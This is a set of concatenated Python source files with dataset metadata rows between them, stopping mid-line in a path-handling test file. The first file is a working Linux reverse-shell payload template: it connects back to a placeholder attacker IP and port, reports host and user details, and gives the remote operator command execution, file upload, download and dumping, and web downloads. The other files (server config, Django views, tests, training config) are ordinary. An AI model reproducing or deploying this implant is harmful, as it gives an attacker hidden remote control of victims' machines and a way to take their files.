] | 4 | 2018-09-20T13:37:28.000Z | 2022-02-23T00:36:55.000Z | payload_templates/lin_shell_payload.py | ahirejayeshbapu/python-shell | 3560fe03f89557c1189255ca2737accdeda48faf | [
"MIT"
] | null | null | null | payload_templates/lin_shell_payload.py | ahirejayeshbapu/python-shell | 3560fe03f89557c1189255ca2737accdeda48faf | [
"MIT"
] | null | null | null | import subprocess, os, socket, re, pickle, docx, urllib2
from platform import platform
from getpass import getuser
from time import sleep
from datetime import datetime
port = !!!!!
ip_addr = @@@@@
lkey = #####
End = $$$$$
skey = %%%%%
time_to_sleep = ^^^^^
type_of_scout = 'Command Shell'
try:
operating_sys = platform()
except:
operating_sys = '?????'
try:
hostname = socket.gethostname()
except:
hostname = '?????'
try:
username = getuser()
except:
username = '?????'
userinfo = hostname + '/' + username
scout_data = [skey, lkey, userinfo, type_of_scout, operating_sys]
shell_type = '/bin/bash'
s = None
help_menu = '''\nCommand Shell Menu
==================
Global Commands :
banner Display a banner
clear Clear the screen
help Show the help menu
local <shell command> Locally execute a shell command
python Enter the system python interpreter
quit Quit the framework
Connection commands :
disconnect Make the scout disconnect and try to reconnect
terminate Kill the scout process
sleep <seconds> Disconnect the scout and make it sleep for some time
Handler commands :
back Move back to scout handler
Command Shell Commands :
exec <shell command> Executes shell command and returns output
exec_file <shell command> Executes a shell command with no output(use this to run files and avoid blocking)
swap <shell path> Switch the type of shell used, default is "/bin/bash"
File Commands :
download <filepath> Download file
dump <filepath> Dump and view file content(supports .docx file)
upload <filepath> Upload a file
web_download <url> Download a file through a url\n'''
def basename(filepath):
basename = re.search(r'[^\\/]+(?=[\\/]?$)', filepath)
if basename:
return basename.group(0)
def recvall(tar_socket):
tar_socket.settimeout(None)
data = tar_socket.recv(9999)
if not data:
return ''
while True:
if data.endswith(End):
try:
tar_socket.settimeout(1)
more_data = tar_socket.recv(9999)
if not more_data:
return data[:-len(End)]
data += more_data
except (socket.timeout,socket.error):
tar_socket.settimeout(None)
return data[:-len(End)]
else:
more_data = tar_socket.recv(9999)
data += more_data
def shell_execute(execute):
if execute[:3] == 'cd ':
try:
execute = execute.replace('cd ', '')
os.chdir(execute)
s.sendall("[+]Changed to directory : " + execute + End)
except:
s.sendall('[-]Could not change to directory : ' + execute + End)
else:
try:
result = subprocess.Popen(execute, shell=True, executable=shell_type, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
result = result.stdout.read() + result.stderr.read()
try:
s.sendall(unicode(result + End))
except:
s.sendall(result + End)
except:
s.sendall('[-]Could not execute command' + End)
def file_execute(command):
try:
result = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
s.sendall('[+]Executed : ' + command + End)
except Exception as e:
s.sendall('[-]Error executing, "' + command + '" : ' + str(e) + End)
def upload_file(file_name, content):
try:
f = open(basename(file_name), 'wb')
f.write(content)
f.close()
s.sendall('[+]Uploaded file successfully' + End)
except Exception as e:
s.sendall('[-]Error writing to file "' + file_name + '" : ' + str(e) + End)
def download_file(file_name):
if os.path.isfile(file_name):
try:
f = open(file_name, 'rb')
bin_data = f.read()
f.close()
s.sendall(file_name + '|/' + bin_data + End)
except Exception as e:
s.sendall('[-]Error reading from file "' + file_name + '" : ' + str(e) + End)
else:
s.sendall('[-]File path/name is not valid' + End)
def dump_file(file_name):
try:
if os.path.isfile(file_name):
extension = basename(file_name).split('.')[-1] #
if extension == 'docx':
try:
doc = docx.Document(file_name)
data = '\n\n'.join([paragraph.text.encode('utf-8') for paragraph in doc.paragraphs])
s.sendall(data + End)
except Exception as e:
s.sendall('[-]Error reading "' + file_name + '" : ' + str(e) + End)
else:
try:
f = open(file_name, 'rb')
data = f.read()
f.close()
try:
s.sendall(unicode(data + End))
except:
try:
s.sendall(data + End)
except Exception as e:
s.sendall('[-]Error dumping file "' + basename(file_name) + '" : ' + str(e) + End)
except Exception as e:
s.sendall('[-]Error reading "' + file_name + '" : ' + str(e) + End)
else:
s.sendall('[-]File path/name is not valid' + End)
except Exception as e:
s.sendall('[-]Error dumping file : ' + str(e) + End)
def download_from_web(url):
try:
url_data = url.split('/')[-1]
file_name = urllib2.unquote(url_data)
if file_name == '':
file_name = datetime.now().strftime("%Y%m%d-%H%M%S")
response = urllib2.urlopen(url)
data = response.read()
f = open(file_name, 'wb')
f.write(data)
f.close()
s.sendall('[+]Downloaded : ' + url + ' -> ' + file_name + End)
except Exception as e:
s.sendall('[-]Error downloading file : ' + str(e) + End)
def main():
global s, shell_type
while True:
while True:
try:
s = socket.socket()
s.connect((ip_addr, port))
break
except:
sleep(time_to_sleep)
continue
s.sendall(pickle.dumps(scout_data) + End)
while True:
try:
#s.settimeout(None)
data = recvall(s).split(' ', 1)
command = data[0]
if command == 'help':
s.sendall(help_menu + End)
elif command == 'disconnect':
s.sendall('[*]Disconnecting...' + End)
sleep(5)
break
elif command == 'terminate':
s.sendall('[*]Terminating scout...' + End)
os._exit(1)
elif command == 'sleep':
try:
sleep_time = int(data[1])
except:
s.sendall('[-]Please specify an integer as the sleep duration' + End)
continue
s.sendall('[*]Scout going offline for : ' + str(sleep_time) + ' seconds' + End)
s.shutdown(1)
s.close()
for i in range(sleep_time):
sleep(1)
break
elif command == 'exec':
try:
execute = data[1]
except:
s.sendall('[-]Specify a command to execute' + End)
continue
shell_execute(execute)
elif command == 'exec_file':
try:
execute = data[1]
except:
s.sendall('[-]Specify command/file to execute' + End)
continue
file_execute(execute)
elif command == 'swap':
try:
shell_type = data[1]
s.sendall('[+]Current shell in use is : '+shell_type+End)
except:
s.sendall('[-]Specify a shell type'+End)
elif command == 'download':
try:
file_name = data[1]
except:
s.sendall('[-]Specify file to download' + End)
continue
download_file(file_name)
elif command == 'upload':
data = data[1].split('|/', 1)
file_name = data[0]
file_contents = data[1]
upload_file(file_name, file_contents)
elif command == 'dump':
try:
file_target = data[1]
except:
s.sendall('[-]Specify file to dump contents of' + End)
continue
dump_file(file_target)
elif command == 'web_download':
try:
download_from_web(data[1])
except IndexError:
s.sendall('[-]Specify URL to download from' + End)
continue
except Exception as e:
s.sendall('[-]Error downloading from url : ' + str(e) + End)
continue
elif command == 'ping':
s.sendall('[+]Scout is alive' + End)
else:
s.sendall('[-]Unknown command "' + command + '", run "help" for help menu' + End)
except (socket.error, socket.timeout):
try:
s.shutdown(1)
s.close()
break
except socket.error:
break
except Exception as e:
try:
if command:
s.sendall('[-]Error, last run command : ' + command + '. Error message : ' + str(e) + End)
else:
s.sendall('[-]Error message : ' + str(e) + End)
except:
s.shutdown(1)
s.close()
break
main()
| 37.713805 | 130 | 0.44871 | 1,078 | 11,201 | 4.579777 | 0.204082 | 0.064817 | 0.028965 | 0.036459 | 0.263318 | 0.215718 | 0.166498 | 0.155965 | 0.097022 | 0.073121 | 0 | 0.006444 | 0.445853 | 11,201 | 296 | 131 | 37.841216 | 0.788948 | 0.001607 | 0 | 0.403704 | 0 | 0.003704 | 0.231618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.003704 | 0.018519 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b17898d3cc02bf7ea9e57ca3010adf0a3b3916ab | 435 | py | Python | source/blockchain_backup/config/gunicorn.conf.py | denova-com/blockchain-backup | a445bcbd67bd6485a4969dc1e24d51fbffc43cff | [
"OLDAP-2.6",
"OLDAP-2.4"
] | null | null | null | source/blockchain_backup/config/gunicorn.conf.py | denova-com/blockchain-backup | a445bcbd67bd6485a4969dc1e24d51fbffc43cff | [
"OLDAP-2.6",
"OLDAP-2.4"
] | null | null | null | source/blockchain_backup/config/gunicorn.conf.py | denova-com/blockchain-backup | a445bcbd67bd6485a4969dc1e24d51fbffc43cff | [
"OLDAP-2.6",
"OLDAP-2.4"
] | null | null | null | # See
# The configuration file should be a valid Python source file with a python extension (e.g. gunicorn.conf.py).
# https://docs.gunicorn.org/en/stable/configure.html
bind='127.0.0.1:8962'
timeout=75
daemon=True
user='user'
accesslog='/var/local/log/user/blockchain_backup.gunicorn.access.log'
errorlog='/var/local/log/user/blockchain_backup.gunicorn.error.log'
log_level='debug'
capture_output=True
max_requests=3
workers=1
| 29 | 113 | 0.777011 | 71 | 435 | 4.690141 | 0.71831 | 0.048048 | 0.066066 | 0.09009 | 0.234234 | 0.234234 | 0.234234 | 0 | 0 | 0 | 0 | 0.035264 | 0.087356 | 435 | 14 | 114 | 31.071429 | 0.803526 | 0.388506 | 0 | 0 | 0 | 0 | 0.519084 | 0.431298 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b1791920593f4e50adb1ee5900ad47f68783a7d1 | 211 | py | Python | code_snippets/api-monitor-schedule-downtime.py | brettlangdon/documentation | 87c23cb1d5e3e877bb37a19f7231b5d9239509dc | [
"BSD-3-Clause"
] | null | null | null | code_snippets/api-monitor-schedule-downtime.py | brettlangdon/documentation | 87c23cb1d5e3e877bb37a19f7231b5d9239509dc | [
"BSD-3-Clause"
] | null | null | null | code_snippets/api-monitor-schedule-downtime.py | brettlangdon/documentation | 87c23cb1d5e3e877bb37a19f7231b5d9239509dc | [
"BSD-3-Clause"
] | null | null | null | from datadog import initialize, api
options = {
'api_key': 'api_key',
'app_key': 'app_key'
}
initialize(**options)
# Schedule downtime
api.Downtime.create(scope='env:staging', start=int(time.time()))
| 17.583333 | 64 | 0.691943 | 28 | 211 | 5.071429 | 0.607143 | 0.084507 | 0.126761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14218 | 211 | 11 | 65 | 19.181818 | 0.78453 | 0.080569 | 0 | 0 | 0 | 0 | 0.203125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b17a29c0eb42919a5d5dc662a31db12c22531561 | 4,596 | py | Python | plugins/base/views.py | adlerosn/corpusslayer | d3dea2e2d15e911d048a39f6ef6cb2d5f7b33e58 | [
"MIT"
] | null | null | null | plugins/base/views.py | adlerosn/corpusslayer | d3dea2e2d15e911d048a39f6ef6cb2d5f7b33e58 | [
"MIT"
] | 1 | 2019-07-06T20:43:45.000Z | 2019-07-06T20:43:45.000Z | plugins/base/views.py | adlerosn/corpusslayer | d3dea2e2d15e911d048a39f6ef6cb2d5f7b33e58 | [
"MIT"
] | null | null | null | # Copyright (c) 2017 Adler Neves <adlerosn@gmail.com>
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
pluginName = os.path.abspath(__file__).split(os.path.sep)[-2]
importline1 = 'import '+('.'.join(['plugins',pluginName,'models'])+' as models')
importline2 = 'import '+('.'.join(['plugins',pluginName,'forms'])+' as forms')
exec(importline1) #import plugins.thisplugin.models as models
exec(importline2) #import plugins.thisplugin.forms as forms
import application.forms as app_forms
import application.models as app_models
import application.business as app_ctrl
from django.utils.translation import ugettext_lazy as _
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views.generic import View
from django.views.generic import TemplateView
from django.template.response import TemplateResponse
from django.http import Http404
from django.urls import reverse
from django.core.paginator import Paginator
from urllib.parse import urlencode
from view.pages.views import SoonView, TemplateViewLoggedIn, UserPartEditFormView
from view.pages.views import CrudDeleteView, CrudEditView, CrudListView
import re
import json
import base64
def escapeRegex(s):
o = ''
for c in s:
if c in ',.+*?|^$[]{}()\\':
o+='\\'
o+=c
return o
def findFirstStringAtZero(el):
if isinstance(el,str):
return el
else:
return findFirstStringAtZero(el[0])
class MockRegexSeachWithIn:
def __init__(self, data):
self.data = data
def search(self, bigger):
if bigger.__contains__(self.data):
return True
return None
# Create your views here.
class DocumentView(TemplateViewLoggedIn):
template_name = 'plugins/base/document.html'
def get(self, request, corpus_pk='0', doc_pk='0'):
bl = app_ctrl.Business(request)
document = app_models.Document.objects.get(user__id=bl.user.id, corpus__pk=corpus_pk, pk=doc_pk)
corpus = document.corpus
return render(request, self.template_name, {
'corpus': corpus,
'document': document,
'textlines': document.text.strip().splitlines(),
})
class FinderView(TemplateViewLoggedIn):
template_name = 'plugins/base/finder.html'
def get(self, request, corpus_pk='0', fragment=''):
bl = app_ctrl.Business(request)
corpus = app_models.Corpus.objects.get(user__id=bl.user.id, pk=corpus_pk)
documents = corpus.documents.all()
wanted = json.loads(base64.b64decode(fragment).decode('utf-8'))
searched = None
if isinstance(wanted,str):
searched = escapeRegex(wanted.strip())
searched = searched.replace(' ','\\s*')
wanted = re.compile(searched)
else:
searched = '\\s*'.join(map(escapeRegex, map(findFirstStringAtZero, wanted)))
wanted = re.compile(searched)
matchedDocs = list()
for document in documents:
if wanted.search(document.text) is not None:
matchedDocs.append(document)
matchedDocs.sort(key=lambda a: a.title)
if len(matchedDocs)<=0:
raise Http404("Couldn't find any document with: "+searched)
if len(matchedDocs)==1:
return HttpResponseRedirect(reverse('base_document',None,[corpus_pk,matchedDocs[0].pk]))
return render(request, self.template_name, {
'query':searched,
'corpus':corpus,
'documents':matchedDocs,
})
| 38.3 | 104 | 0.698216 | 579 | 4,596 | 5.474957 | 0.392055 | 0.031546 | 0.013249 | 0.018927 | 0.13123 | 0.056151 | 0.034069 | 0.018927 | 0 | 0 | 0 | 0.007913 | 0.202567 | 4,596 | 119 | 105 | 38.621849 | 0.857026 | 0.258921 | 0 | 0.142857 | 0 | 0 | 0.069231 | 0.014793 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.285714 | 0 | 0.511905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
b17bb1524daf129418a0726643402df5cb23be6d | 691 | py | Python | tests/test_constants.py | 9cat/dydx-v3-python | c222f3d0b1a870e63fcceaf19b42109c9558a6df | [
"Apache-2.0"
] | null | null | null | tests/test_constants.py | 9cat/dydx-v3-python | c222f3d0b1a870e63fcceaf19b42109c9558a6df | [
"Apache-2.0"
] | null | null | null | tests/test_constants.py | 9cat/dydx-v3-python | c222f3d0b1a870e63fcceaf19b42109c9558a6df | [
"Apache-2.0"
] | null | null | null | from dydx3.constants import SYNTHETIC_ASSET_MAP, SYNTHETIC_ASSET_ID_MAP, ASSET_RESOLUTION, COLLATERAL_ASSET
class TestConstants():
def test_constants_have_regular_structure(self):
for market, asset in SYNTHETIC_ASSET_MAP.items():
market_parts = market.split('-')
base_token, quote_token = market_parts
assert base_token == asset
assert quote_token == 'USD'
assert len(market_parts) == 2
assert list(SYNTHETIC_ASSET_MAP.values()) == list(SYNTHETIC_ASSET_ID_MAP.keys())
assets = [x for x in ASSET_RESOLUTION.keys() if x != COLLATERAL_ASSET]
assert assets == list(SYNTHETIC_ASSET_MAP.values())
| 40.647059 | 107 | 0.688857 | 86 | 691 | 5.197674 | 0.430233 | 0.187919 | 0.152125 | 0.085011 | 0.120805 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003724 | 0.222865 | 691 | 16 | 108 | 43.1875 | 0.828678 | 0 | 0 | 0 | 0 | 0 | 0.005789 | 0 | 0 | 0 | 0 | 0 | 0.416667 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b17fee2e7308f25f04ee5daea15a5c921b98ff99 | 2,009 | py | Python | cifar_exps/metric/local_config.py | maestrojeong/Deep-Hash-Table-ICML18- | 0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5 | [
"MIT"
] | 70 | 2018-06-03T04:19:13.000Z | 2021-11-08T10:40:46.000Z | cifar_exps/metric/local_config.py | maestrojeong/Deep-Hash-Table-ICML18- | 0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5 | [
"MIT"
] | null | null | null | cifar_exps/metric/local_config.py | maestrojeong/Deep-Hash-Table-ICML18- | 0c7efa230f950d5a2cd1928ac9f5d99f4276d2b5 | [
"MIT"
] | 14 | 2018-06-03T16:34:55.000Z | 2020-09-09T17:02:30.000Z | import sys
sys.path.append("../../configs")
#../../configs
from path import EXP_PATH
import numpy as np
DECAY_PARAMS_DICT =\
{
'stair' :
{
128 :{
'a1': {'initial_lr' : 1e-5, 'decay_steps' : 50000, 'decay_rate' : 0.3},
'a2' : {'initial_lr' : 3e-4, 'decay_steps' : 50000, 'decay_rate' : 0.3},
'a3' : {'initial_lr' : 1e-3, 'decay_steps' : 50000, 'decay_rate' : 0.3},
'a4' : {'initial_lr' : 3e-3, 'decay_steps' : 50000, 'decay_rate' : 0.3},
'a5' : {'initial_lr' : 1e-2, 'decay_steps' : 50000, 'decay_rate' : 0.3}
}
},
'piecewise' :
{
128 : {
'a1' : {'boundaries' : [10000, 20000], 'values' : [1e-4, 3e-5, 1e-5]},
'a2' : {'boundaries' : [10000, 20000], 'values' : [3e-4, 1e-4, 3e-5]},
'a3' : {'boundaries' : [10000, 20000], 'values' : [1e-3, 3e-4, 1e-4]},
'a4' : {'boundaries' : [10000, 20000], 'values' : [3e-3, 1e-3, 3e-4]},
'a5' : {'boundaries' : [10000, 20000], 'values' : [1e-2, 3e-3, 1e-3]},
'b1' : {'boundaries' : [20000, 35000], 'values' : [1e-4, 3e-5, 1e-5]},
'b2' : {'boundaries' : [20000, 35000], 'values' : [3e-4, 1e-4, 3e-5]},
'b3' : {'boundaries' : [20000, 35000], 'values' : [1e-3, 3e-4, 1e-4]},
'b4' : {'boundaries' : [20000, 35000], 'values' : [3e-3, 1e-3, 3e-4]},
'b5' : {'boundaries' : [20000, 35000], 'values' : [1e-2, 3e-3, 1e-3]}
}
}
}
ACTIVATE_K_SET = np.arange(1, 5)
K_SET = [1,4,16]
RESULT_DIR = EXP_PATH+"cifar_exps/"
#========================PARAM============================#
DATASET= 'cifar'
GPU_ID = 0
BATCH_SIZE = 128
EPOCH = 300
NSCLASS = 16
# model
EMBED_M= 64
CONV_NAME = 'conv1'
# metric loss
LOSS_TYPE = 'triplet'
MARGIN_ALPHA = 0.3
LAMBDA = 0.003 # regularization for npair
# learning
DECAY_TYPE = 'stair'
DECAY_PARAM_TYPE = 'a3'
| 36.527273 | 88 | 0.47337 | 254 | 2,009 | 3.614173 | 0.318898 | 0.022876 | 0.081699 | 0.108932 | 0.525054 | 0.30719 | 0.30719 | 0.058824 | 0 | 0 | 0 | 0.177888 | 0.297661 | 2,009 | 54 | 89 | 37.203704 | 0.472714 | 0.060727 | 0 | 0.042553 | 0 | 0 | 0.216605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.06383 | 0 | 0.06383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b18129f45c367129cdadaeeefa97748f7c44101b | 1,133 | py | Python | POO punto 2/ManagerUsers.py | nan0te/Python-Algorithm-And-DataStructure | 7b7802b56d397c38f230f5efb687cedc6cc263f3 | [
"MIT"
] | null | null | null | POO punto 2/ManagerUsers.py | nan0te/Python-Algorithm-And-DataStructure | 7b7802b56d397c38f230f5efb687cedc6cc263f3 | [
"MIT"
] | null | null | null | POO punto 2/ManagerUsers.py | nan0te/Python-Algorithm-And-DataStructure | 7b7802b56d397c38f230f5efb687cedc6cc263f3 | [
"MIT"
] | null | null | null |
from Profesional import Profesional
from Particular import Particular
from Comercial import Comercial
class ManagerUsers:
userslist = []
def addProfesional(self, name, address, baja, area, titulo):
profesional = Profesional(name, address, baja, area, titulo)
self.userslist.append(profesional)
def addParticular(self, name, address, baja, dni, fechaNac):
particular = Particular(name, address, baja, dni, fechaNac)
self.userslist.append(particular)
|
def addComercial(self, name, address, baja, rubro, cuilt):
comercial = Comercial(name, address, baja, rubro, cuilt)
self.userslist.append(comercial)
def searchUser(self, name):
for user in self.userslist:
if name == user.getName():
user.muestra()
def imprimirUsuarios(self):
for user in self.userslist:
user.muestra()
def deleteUser(self, name):
position = 0
for user in self.userslist:
if name == user.getName():
user.pop(position)
position = position + 1
| 28.325 | 68 | 0.620477 | 118 | 1,133 | 5.957627 | 0.305085 | 0.093883 | 0.128023 | 0.081081 | 0.369844 | 0.122333 | 0.122333 | 0.122333 | 0.122333 | 0.122333 | 0 | 0.002481 | 0.288614 | 1,133 | 39 | 69 | 29.051282 | 0.869727 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.107143 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b188895e8bd69c46255cb2668635f56b60539874 | 14,875 | py | Python | tests/test_gpath.py | ConductorTechnologies/ciopath | 574bfc38859cc68a80b98f8b0cf0d9aeddb646e5 | [
"MIT"
] | 1 | 2020-10-13T07:50:19.000Z | 2020-10-13T07:50:19.000Z | tests/test_gpath.py | ConductorTechnologies/ciopath | 574bfc38859cc68a80b98f8b0cf0d9aeddb646e5 | [
"MIT"
] | null | null | null | tests/test_gpath.py | ConductorTechnologies/ciopath | 574bfc38859cc68a80b98f8b0cf0d9aeddb646e5 | [
"MIT"
] | null | null | null | """ test gpath
isort:skip_file
"""
import os
import sys
import unittest
try:
from unittest import mock
except ImportError:
import mock
SRC = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "src")
if SRC not in sys.path:
sys.path.insert(0, SRC)
from ciopath.gpath import Path
sys.modules["glob"] = __import__("mocks.glob", fromlist=["dummy"])
class BadInputTest(unittest.TestCase):
def test_empty_input(self):
with self.assertRaises(ValueError):
self.p = Path("")
class RootPath(unittest.TestCase):
def test_root_path(self):
self.p = Path("/")
self.assertEqual(self.p.fslash(), "/")
self.assertEqual(self.p.bslash(), "\\")
def test_drive_letter_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(), "C:/")
self.assertEqual(self.p.bslash(), "C:\\")
class SpecifyDriveLetterUse(unittest.TestCase):
def test_remove_from_path(self):
self.p = Path("C:\\a\\b\\c")
self.assertEqual(self.p.fslash(with_drive=False), "/a/b/c")
self.assertEqual(self.p.bslash(with_drive=False), "\\a\\b\\c")
def test_remove_from_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(with_drive=False), "/")
self.assertEqual(self.p.bslash(with_drive=False), "\\")
class AbsPosixPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("/a/b/c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "\\a\\b\\c")
class AbsWindowsPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("C:\\a\\b\\c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "C:/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
# consider just testing on both platforms
def test_os_path_out(self):
with mock.patch("os.name", "posix"):
self.assertEqual(self.p.os_path(), "C:/a/b/c")
with mock.patch("os.name", "nt"):
self.assertEqual(self.p.os_path(), "C:\\a\\b\\c")
class PathStringTest(unittest.TestCase):
def test_path_emits_string_posix(self):
input_file = "/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_with_drive(self):
input_file = "C:/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_relative(self):
input_file = "path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
class WindowsMixedPathTest(unittest.TestCase):
def test_abs_in_fslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "/a/b/c/d/e")
def test_abs_in_bslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "\\a\\b\\c\\d\\e")
def test_letter_abs_in_fslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "C:/a/b/c/d/e")
def test_letter_abs_in_bslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c\\d\\e")
class MiscPathTest(unittest.TestCase):
def test_many_to_single_backslashes_bslash_out(self):
self.p = Path("C:\\\\a\\b///c")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
class PathExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
def test_posix_tilde_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_posix_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/c")
def test_posix_two_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/$DEPT/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/texturing/c")
def test_windows_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$HOME\\a\\b\\c")
self.assertEqual(self.p.bslash(), "\\users\\joebloggs\\a\\b\\c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_tilde_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "~/a/b/c")
def test_posix_var_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "$SHOT/a/b/c")
def no_expand_variable_considered_relative(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertTrue(self.p.relative)
self.assertFalse(self.p.absolute)
def expanded_variable_considered_absolute(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=False)
self.assertFalse(self.p.relative)
self.assertTrue(self.p.absolute)
class PathContextExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
self.context = {
"HOME": "/users/janedoe",
"FOO": "fooval",
"BAR_FLY1_": "bar_fly1_val",
"ROOT_DIR": "/some/root",
}
def test_path_replaces_context(self):
self.p = Path("$ROOT_DIR/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env(self):
self.p = Path("$HOME/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leave_unknown_variable_in_tact(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/$FOO/thefile.$F.jpg", context=self.context)
